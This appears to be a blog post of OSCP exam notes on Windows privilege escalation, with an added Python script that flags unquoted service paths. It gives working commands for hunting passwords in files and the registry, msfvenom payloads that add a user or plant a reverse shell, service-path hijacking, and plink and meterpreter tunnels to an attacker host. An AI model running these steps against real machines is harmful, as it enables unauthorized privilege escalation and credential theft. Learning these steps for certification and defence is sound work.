
Sunday 6 October 2019

OSCP - Privilege Escalation (Windows)


1) Kernel Exploits:

Download Windows Exploit Suggester and update its database (an Excel sheet of Microsoft security bulletins).

Run the 'systeminfo' command on the victim machine and copy the output to a text file, e.g. sysinfo_victim.txt. Then compare it against the database:

./windows-exploit-suggester.py --database latest_database_file_mssb.xlsx --systeminfo sysinfo_victim.txt

2) Search for clear passwords:

In files-

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 

dir c:\ /s /b | findstr /si *vnc.ini

Unattended-install and sysprep answer files that often contain (sometimes base64-encoded) local account passwords:

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml


Search for passwords-

--> Find the word "password" in all files (recursive, case-insensitive, with line numbers).
findstr /spin "password" *.*

--> Find files whose names suggest credentials, and search config-type files for passwords.
dir /s *pass* == *cred* == *vnc* == *.config*

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini


In Registry-

—> VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

--> Windows autologon (DefaultUserName / DefaultPassword)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

--> SNMP parameters (community strings)
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

—> Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

—> Search for password in registry
reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s


3) Always Install Elevated:

To check if alwaysinstallelevated is enabled-

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

'The system was unable to find the specified registry key or value' means that 'AlwaysInstallElevated' is not enabled. The policy only takes effect when the value is set to 1 under both HKLM and HKCU.

If it is enabled, use msfvenom to generate a .msi file; installing it runs the payload as Administrator, e.g. to add a user or get a reverse shell:


msfvenom -p windows/adduser USER=hacker PASS=myPass -f msi -o escalate.msi


4) Trusted Service Path (unquoted service path)

To check-

Using wmic (auto-start services outside C:\Windows whose path is not quoted):

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Using sc:

sc query
sc qc <service name>

Look for an unquoted BINARY_PATH_NAME that contains spaces, e.g. 'C:\Program Files\Anti Virus\bin\scanner.exe'. Windows resolves such a path by trying 'C:\Program.exe', then 'C:\Program Files\Anti.exe', before the real binary.

To Exploit-

Generate a reverse shell .exe with msfvenom and name it after the first word following a space in the path, Anti.exe in this example. Save it as "C:\Program Files\Anti.exe" (this requires write access to that directory, which is the permission defenders should verify is absent).

Now restart the service so that the planted Anti.exe is executed instead of the intended binary:

sc stop <service name>
sc start <service name>
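The check above, as an added example that is not from the original post: a small Python script that parses the output of `wmic service get name,displayname,pathname,startmode /format:list`, applies the same filter as the findstr chain (Auto start, outside C:\Windows, not quoted) and lists the intermediate paths Windows would try first, so an administrator knows which service paths to quote and which directories must not be writable. SAMPLE_OUTPUT is constructed, not captured from a real host.

```python
# Added example: flag services whose unquoted binary path contains spaces, parsed from
# `wmic service get name,displayname,pathname,startmode /format:list` output.
import re

# Constructed sample output (not captured from a real host).
SAMPLE_OUTPUT = """DisplayName=Anti Virus Scanner
Name=AVScanner
PathName=C:\\Program Files\\Anti Virus\\bin\\scanner.exe
StartMode=Auto

DisplayName=Good Vendor Agent
Name=GoodAgent
PathName="C:\\Program Files\\Good Vendor\\agent.exe" -service
StartMode=Auto

DisplayName=Windows Update
Name=wuauserv
PathName=C:\\Windows\\system32\\svchost.exe -k netsvcs
StartMode=Auto
"""

def parse_wmic_list(text):
    """One dict per service; /format:list separates records with blank lines."""
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = dict(line.partition("=")[::2] for line in block.splitlines() if "=" in line)
        yield {k.strip(): v.strip() for k, v in rec.items()}

def unquoted_binary(pathname):
    """Return the executable path if PathName is unquoted and contains a space, else None."""
    if pathname.startswith('"'):
        return None
    m = re.match(r"(.*?\.exe)", pathname, re.IGNORECASE)  # path ends at .exe; arguments follow
    binary = m.group(1) if m else pathname
    return binary if " " in binary else None

def hijack_candidates(binary):
    """Paths Windows tries before the real binary: each prefix up to a space, plus .exe."""
    return [binary[:i] + ".exe" for i, ch in enumerate(binary) if ch == " "]

def find_unquoted_services(text):
    """[(name, binary, candidates)] for Auto services outside C:\\Windows, the post's findstr filter."""
    hits = []
    for rec in parse_wmic_list(text):
        path = rec.get("PathName", "")
        if rec.get("StartMode", "").lower() != "auto" or path.lower().startswith("c:\\windows\\"):
            continue
        binary = unquoted_binary(path)
        if binary:
            hits.append((rec["Name"], binary, hijack_candidates(binary)))
    return hits
```

On a real host, feed it the saved wmic output instead of SAMPLE_OUTPUT; the fix for each hit is to quote the ImagePath and confirm that only administrators can write to the listed directories.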

5) Services only available inside the victim machine

To check-

netstat -ano

Look for services listening on 127.0.0.1 only, which cannot be reached directly from the attacking machine.

To exploit-

Forward the port to the attacking machine so the service can be reached from there:

—> Port forward using plink
plink.exe -l attacker_username -pw attacker_pass <attackerip> -R 8080:127.0.0.1:8080

—> Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101


